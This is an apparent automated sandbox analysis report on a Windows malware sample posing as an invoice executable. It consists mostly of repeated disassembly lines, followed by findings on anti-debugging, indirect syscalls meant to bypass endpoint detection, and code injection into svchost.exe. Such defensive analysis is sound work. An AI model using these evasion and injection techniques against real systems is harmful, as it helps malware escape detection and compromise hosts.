          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6656A mov eax, dword ptr fs:[00000030h]17_2_03C6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6656A mov eax, dword ptr fs:[00000030h]17_2_03C6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6656A mov eax, dword ptr fs:[00000030h]17_2_03C6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC6500 mov eax, dword ptr fs:[00000030h]17_2_03CC6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04500 mov eax, dword ptr fs:[00000030h]17_2_03D04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04500 mov eax, dword ptr fs:[00000030h]17_2_03D04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04500 mov eax, dword ptr fs:[00000030h]17_2_03D04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04500 mov eax, dword ptr fs:[00000030h]17_2_03D04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04500 mov eax, dword ptr fs:[00000030h]17_2_03D04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04500 mov eax, dword ptr fs:[00000030h]17_2_03D04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04500 mov eax, dword ptr fs:[00000030h]17_2_03D04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40535 mov eax, dword ptr fs:[00000030h]17_2_03C40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40535 mov eax, dword ptr fs:[00000030h]17_2_03C40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40535 mov eax, dword ptr fs:[00000030h]17_2_03C40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40535 mov eax, dword ptr fs:[00000030h]17_2_03C40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40535 mov eax, dword ptr fs:[00000030h]17_2_03C40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40535 mov eax, dword ptr fs:[00000030h]17_2_03C40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E53E mov eax, dword ptr fs:[00000030h]17_2_03C5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E53E mov eax, dword ptr fs:[00000030h]17_2_03C5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E53E mov eax, dword ptr fs:[00000030h]17_2_03C5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E53E mov eax, dword ptr fs:[00000030h]17_2_03C5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E53E mov eax, dword ptr fs:[00000030h]17_2_03C5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C304E5 mov ecx, dword ptr fs:[00000030h]17_2_03C304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEA49A mov eax, dword ptr fs:[00000030h]17_2_03CEA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C364AB mov eax, dword ptr fs:[00000030h]17_2_03C364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C644B0 mov ecx, dword ptr fs:[00000030h]17_2_03C644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]17_2_03CBA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E443 mov eax, dword ptr fs:[00000030h]17_2_03C6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E443 mov eax, dword ptr fs:[00000030h]17_2_03C6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E443 mov eax, dword ptr fs:[00000030h]17_2_03C6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E443 mov eax, dword ptr fs:[00000030h]17_2_03C6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E443 mov eax, dword ptr fs:[00000030h]17_2_03C6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E443 mov eax, dword ptr fs:[00000030h]17_2_03C6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E443 mov eax, dword ptr fs:[00000030h]17_2_03C6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E443 mov eax, dword ptr fs:[00000030h]17_2_03C6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEA456 mov eax, dword ptr fs:[00000030h]17_2_03CEA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2645D mov eax, dword ptr fs:[00000030h]17_2_03C2645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5245A mov eax, dword ptr fs:[00000030h]17_2_03C5245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBC460 mov ecx, dword ptr fs:[00000030h]17_2_03CBC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5A470 mov eax, dword ptr fs:[00000030h]17_2_03C5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5A470 mov eax, dword ptr fs:[00000030h]17_2_03C5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5A470 mov eax, dword ptr fs:[00000030h]17_2_03C5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C68402 mov eax, dword ptr fs:[00000030h]17_2_03C68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C68402 mov eax, dword ptr fs:[00000030h]17_2_03C68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C68402 mov eax, dword ptr fs:[00000030h]17_2_03C68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2E420 mov eax, dword ptr fs:[00000030h]17_2_03C2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2E420 mov eax, dword ptr fs:[00000030h]17_2_03C2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2E420 mov eax, dword ptr fs:[00000030h]17_2_03C2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2C427 mov eax, dword ptr fs:[00000030h]17_2_03C2C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB6420 mov eax, dword ptr fs:[00000030h]17_2_03CB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB6420 mov eax, dword ptr fs:[00000030h]17_2_03CB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB6420 mov eax, dword ptr fs:[00000030h]17_2_03CB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB6420 mov eax, dword ptr fs:[00000030h]17_2_03CB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB6420 mov eax, dword ptr fs:[00000030h]17_2_03CB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB6420 mov eax, dword ptr fs:[00000030h]17_2_03CB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB6420 mov eax, dword ptr fs:[00000030h]17_2_03CB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A430 mov eax, dword ptr fs:[00000030h]17_2_03C6A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C50BCB mov eax, dword ptr fs:[00000030h]17_2_03C50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C50BCB mov eax, dword ptr fs:[00000030h]17_2_03C50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C50BCB mov eax, dword ptr fs:[00000030h]17_2_03C50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C30BCD mov eax, dword ptr fs:[00000030h]17_2_03C30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C30BCD mov eax, dword ptr fs:[00000030h]17_2_03C30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C30BCD mov eax, dword ptr fs:[00000030h]17_2_03C30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]17_2_03CDEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C38BF0 mov eax, dword ptr fs:[00000030h]17_2_03C38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C38BF0 mov eax, dword ptr fs:[00000030h]17_2_03C38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C38BF0 mov eax, dword ptr fs:[00000030h]17_2_03C38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5EBFC mov eax, dword ptr fs:[00000030h]17_2_03C5EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]17_2_03CBCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40BBE mov eax, dword ptr fs:[00000030h]17_2_03C40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40BBE mov eax, dword ptr fs:[00000030h]17_2_03C40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]17_2_03CE4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]17_2_03CE4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE4B4B mov eax, dword ptr fs:[00000030h]17_2_03CE4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE4B4B mov eax, dword ptr fs:[00000030h]17_2_03CE4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D02B57 mov eax, dword ptr fs:[00000030h]17_2_03D02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D02B57 mov eax, dword ptr fs:[00000030h]17_2_03D02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D02B57 mov eax, dword ptr fs:[00000030h]17_2_03D02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D02B57 mov eax, dword ptr fs:[00000030h]17_2_03D02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC6B40 mov eax, dword ptr fs:[00000030h]17_2_03CC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC6B40 mov eax, dword ptr fs:[00000030h]17_2_03CC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFAB40 mov eax, dword ptr fs:[00000030h]17_2_03CFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD8B42 mov eax, dword ptr fs:[00000030h]17_2_03CD8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28B50 mov eax, dword ptr fs:[00000030h]17_2_03C28B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDEB50 mov eax, dword ptr fs:[00000030h]17_2_03CDEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2CB7E mov eax, dword ptr fs:[00000030h]17_2_03C2CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04B00 mov eax, dword ptr fs:[00000030h]17_2_03D04B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h]17_2_03CAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h]17_2_03CAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h]17_2_03CAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h]17_2_03CAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h]17_2_03CAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h]17_2_03CAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h]17_2_03CAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h]17_2_03CAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h]17_2_03CAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5EB20 mov eax, dword ptr fs:[00000030h]17_2_03C5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5EB20 mov eax, dword ptr fs:[00000030h]17_2_03C5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF8B28 mov eax, dword ptr fs:[00000030h]17_2_03CF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF8B28 mov eax, dword ptr fs:[00000030h]17_2_03CF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C86ACC mov eax, dword ptr fs:[00000030h]17_2_03C86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C86ACC mov eax, dword ptr fs:[00000030h]17_2_03C86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C86ACC mov eax, dword ptr fs:[00000030h]17_2_03C86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C30AD0 mov eax, dword ptr fs:[00000030h]17_2_03C30AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C64AD0 mov eax, dword ptr fs:[00000030h]17_2_03C64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C64AD0 mov eax, dword ptr fs:[00000030h]17_2_03C64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6AAEE mov eax, dword ptr fs:[00000030h]17_2_03C6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6AAEE mov eax, dword ptr fs:[00000030h]17_2_03C6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h]17_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h]17_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h]17_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h]17_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h]17_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h]17_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h]17_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h]17_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h]17_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04A80 mov eax, dword ptr fs:[00000030h]17_2_03D04A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C68A90 mov edx, dword ptr fs:[00000030h]17_2_03C68A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C38AA0 mov eax, dword ptr fs:[00000030h]17_2_03C38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C38AA0 mov eax, dword ptr fs:[00000030h]17_2_03C38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C86AA4 mov eax, dword ptr fs:[00000030h]17_2_03C86AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h]17_2_03C36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h]17_2_03C36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h]17_2_03C36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h]17_2_03C36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h]17_2_03C36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h]17_2_03C36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h]17_2_03C36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40A5B mov eax, dword ptr fs:[00000030h]17_2_03C40A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40A5B mov eax, dword ptr fs:[00000030h]17_2_03C40A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6CA6F mov eax, dword ptr fs:[00000030h]17_2_03C6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6CA6F mov eax, dword ptr fs:[00000030h]17_2_03C6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6CA6F mov eax, dword ptr fs:[00000030h]17_2_03C6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDEA60 mov eax, dword ptr fs:[00000030h]17_2_03CDEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CACA72 mov eax, dword ptr fs:[00000030h]17_2_03CACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CACA72 mov eax, dword ptr fs:[00000030h]17_2_03CACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBCA11 mov eax, dword ptr fs:[00000030h]17_2_03CBCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6CA24 mov eax, dword ptr fs:[00000030h]17_2_03C6CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5EA2E mov eax, dword ptr fs:[00000030h]17_2_03C5EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C54A35 mov eax, dword ptr fs:[00000030h]17_2_03C54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C54A35 mov eax, dword ptr fs:[00000030h]17_2_03C54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6CA38 mov eax, dword ptr fs:[00000030h]17_2_03C6CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC69C0 mov eax, dword ptr fs:[00000030h]17_2_03CC69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]17_2_03C3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]17_2_03C3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]17_2_03C3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]17_2_03C3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]17_2_03C3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]17_2_03C3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C649D0 mov eax, dword ptr fs:[00000030h]17_2_03C649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]17_2_03CFA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]17_2_03CBE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C629F9 mov eax, dword ptr fs:[00000030h]17_2_03C629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C629F9 mov eax, dword ptr fs:[00000030h]17_2_03C629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C309AD mov eax, dword ptr fs:[00000030h]17_2_03C309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C309AD mov eax, dword ptr fs:[00000030h]17_2_03C309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB89B3 mov esi, dword ptr fs:[00000030h]17_2_03CB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB89B3 mov eax, dword ptr fs:[00000030h]17_2_03CB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB89B3 mov eax, dword ptr fs:[00000030h]17_2_03CB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB0946 mov eax, dword ptr fs:[00000030h]17_2_03CB0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04940 mov eax, dword ptr fs:[00000030h]17_2_03D04940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C56962 mov eax, dword ptr fs:[00000030h]17_2_03C56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C56962 mov eax, dword ptr fs:[00000030h]17_2_03C56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C56962 mov eax, dword ptr fs:[00000030h]17_2_03C56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7096E mov eax, dword ptr fs:[00000030h]17_2_03C7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7096E mov edx, dword ptr fs:[00000030h]17_2_03C7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7096E mov eax, dword ptr fs:[00000030h]17_2_03C7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD4978 mov eax, dword ptr fs:[00000030h]17_2_03CD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD4978 mov eax, dword ptr fs:[00000030h]17_2_03CD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBC97C mov eax, dword ptr fs:[00000030h]17_2_03CBC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE908 mov eax, dword ptr fs:[00000030h]17_2_03CAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE908 mov eax, dword ptr fs:[00000030h]17_2_03CAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBC912 mov eax, dword ptr fs:[00000030h]17_2_03CBC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28918 mov eax, dword ptr fs:[00000030h]17_2_03C28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28918 mov eax, dword ptr fs:[00000030h]17_2_03C28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB892A mov eax, dword ptr fs:[00000030h]17_2_03CB892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC892B mov eax, dword ptr fs:[00000030h]17_2_03CC892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]17_2_03C5E8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D008C0 mov eax, dword ptr fs:[00000030h]17_2_03D008C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]17_2_03CFA8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]17_2_03C6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]17_2_03C6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C30887 mov eax, dword ptr fs:[00000030h]17_2_03C30887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBC89D mov eax, dword ptr fs:[00000030h]17_2_03CBC89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C42840 mov ecx, dword ptr fs:[00000030h]17_2_03C42840
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BC1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC1361
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BC4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BC4C7B

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9BJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9FJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 310D008Jump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
